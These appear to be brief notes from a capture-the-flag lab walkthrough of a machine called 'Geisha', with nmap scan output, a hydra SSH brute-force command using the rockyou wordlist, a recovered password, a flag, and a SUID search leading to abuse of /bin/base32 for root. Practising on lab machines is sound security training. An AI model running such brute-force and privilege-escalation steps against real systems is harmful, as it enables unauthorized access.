#SSH Brute-Force
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-15 08:03 EST
Nmap scan report for 192.168.59.82
Host is up (0.0036s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 1b:f2:5d:cd:89:13:f2:49:00:9f:8c:f9:eb:a2:a2:0c (RSA)
|   256 31:5a:65:2e:ab:0f:59:ab:e0:33:3a:0c:fc:49:e0:5f (ECDSA)
|_  256 c6:a7:35:14:96:13:f8:de:1e:e2:bc:e7:c7:66:8b:ac (ED25519)
80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Geisha
|_http-server-header: Apache/2.4.38 (Debian)
8088/tcp open  http    LiteSpeed httpd
|_http-title: Geisha
|_http-server-header: LiteSpeed
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.14 seconds
#Found a Vulnerable target if LiteSpeed 7.1 and vsftpd is 3.0.3 is RDOS 
##SSH Brute Force
hydra -l geisha -P /usr/share/wordlists/rockyou.txt 192.168.1.133 ssh
cat local.txt
Flag1: e1d00ff662f177c9c8c3eac62f887973
ssh geisha@<ip>
#passwod: letmein
find / -perm -u=s -type f 2>/dev/null
/bin/base32
Now for root
LFILE=/root/local.txt
